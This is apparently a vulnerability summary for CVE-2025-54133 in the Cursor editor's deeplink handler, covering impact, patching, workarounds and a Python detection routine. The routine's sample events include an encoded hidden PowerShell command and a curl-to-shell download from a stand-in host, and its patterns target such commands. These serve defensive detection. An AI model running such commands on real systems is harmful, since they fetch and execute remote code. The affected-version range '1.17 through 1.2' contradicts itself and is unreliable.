CVE-2025-54133

9.6 CRITICAL

📋 TL;DR

Cursor code editor versions 1.17 through 1.2 contain a UI information disclosure vulnerability in the MCP deeplink handler that allows attackers to execute arbitrary system commands through social engineering. Users who click malicious cursor:// links and proceed through installation dialogs can have commands executed on their machines. This affects all users running vulnerable versions of Cursor.

💻 Affected Systems

Products:
  • Cursor
Versions: 1.17 through 1.2
Operating Systems: Windows, macOS, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: All installations within the vulnerable version range are affected regardless of configuration.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete system compromise through arbitrary command execution, potentially leading to data theft, ransomware deployment, or persistent backdoor installation.

🟠 Likely Case

Attackers trick users into clicking malicious links via phishing/social engineering, then execute commands to steal credentials, install malware, or exfiltrate sensitive data.

🟢 If Mitigated

Limited impact if users are trained to avoid suspicious links and proper endpoint security controls are in place to detect malicious command execution.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires user interaction (2 clicks) but is straightforward once a malicious link is crafted and delivered via social engineering.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.3

Vendor Advisory: https://github.com/cursor/cursor/security/advisories/GHSA-r22h-5wp2-2wfv

Restart Required: Yes

Instructions:

1. Open the Cursor editor.
2. Go to Settings/About.
3. Check the current version.
4. If it is below 1.3, update to version 1.3 or higher through the built-in update mechanism or download from the official source.
5. Restart Cursor after the update.

🔧 Temporary Workarounds

Disable deeplink protocol handler (platforms: all)

Remove or disable the cursor:// protocol handler registration in your operating system:

  • Windows: reg delete HKCU\Software\Classes\cursor /f
  • macOS: defaults delete com.todesktop.230313mzl
  • Linux: check ~/.config/mimeapps.list and remove cursor:// entries

Note that on macOS `defaults delete` removes the application's entire preferences domain, not only the URL scheme registration, so back up Cursor's settings before running it.

Use web browser link warnings (platforms: all)

Configure browsers to warn about or block cursor:// protocol links.

🧯 If You Can't Patch

  • Train users to never click cursor:// links from untrusted sources
  • Implement application allowlisting to prevent execution of unauthorized commands

🔍 How to Verify

Check if Vulnerable:

Open Cursor, go to Settings/About, and check whether the version is between 1.17 and 1.2 inclusive.

Check Version:

Cursor shows its version in the About dialog; there is no CLI command for it.

Verify Fix Applied:

Confirm that the version shown in Settings/About is 1.3 or higher.

📡 Detection & Monitoring

Log Indicators:

  • Process execution logs showing unexpected commands following cursor:// protocol activation
  • Security logs showing cursor:// protocol handler execution

Network Indicators:

  • Network connections initiated by Cursor to unexpected destinations following link clicks

SIEM Query:

Process execution where parent_process contains 'cursor' AND command_line contains suspicious patterns
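The SIEM query above, worked through as a small detection routine over constructed process-creation events. This is an added example, not part of the original advisory or Cursor's own tooling; the event field names, the sample events and the "suspicious pattern" list are assumptions, and a real deployment would tune them to the editor's legitimate child processes (git, node, language servers).

```python
import re

# Constructed sample process-creation events in a normalised SIEM shape;
# not real telemetry from any incident.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Users\alice\AppData\Local\Programs\cursor\Cursor.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"},
    {"parent_image": "/Applications/Cursor.app/Contents/MacOS/Cursor",
     "image": "/bin/sh",
     "command_line": "sh -c 'curl -fsSL http://example.invalid/setup | sh'"},
    {"parent_image": "/Applications/Cursor.app/Contents/MacOS/Cursor",
     "image": "/usr/bin/git",
     "command_line": "git status --porcelain"},           # benign editor child
    {"parent_image": "/usr/bin/gnome-terminal",
     "image": "/bin/sh",
     "command_line": "sh -c 'curl -fsSL http://example.invalid/setup | sh'"},
]

# Command-line patterns that are unexpected for an editor's child process.
# Illustrative, not exhaustive; pattern names are our own labels.
SUSPICIOUS_PATTERNS = {
    "encoded_powershell": re.compile(r"powershell.*\s-(e|enc|encodedcommand)\b", re.I),
    "download_and_execute": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}


def is_cursor_parent(parent_image: str) -> bool:
    """True when the parent executable's file name contains 'cursor' (case-insensitive)."""
    name = re.split(r"[\\/]", parent_image)[-1]
    return "cursor" in name.lower()


def matched_patterns(command_line: str) -> list[str]:
    """Names of every suspicious pattern found in the command line, in table order."""
    return [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(command_line)]


def flag_events(events):
    """Return (event, [pattern names]) for Cursor-spawned processes with suspicious command lines."""
    hits = []
    for ev in events:
        if not is_cursor_parent(ev["parent_image"]):
            continue                       # parent filter: 'cursor' in parent_process
        names = matched_patterns(ev["command_line"])
        if names:
            hits.append((ev, names))
    return hits


if __name__ == "__main__":
    for ev, names in flag_events(SAMPLE_EVENTS):
        print(f"ALERT parent=Cursor child={ev['image']} patterns={', '.join(names)}")
```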
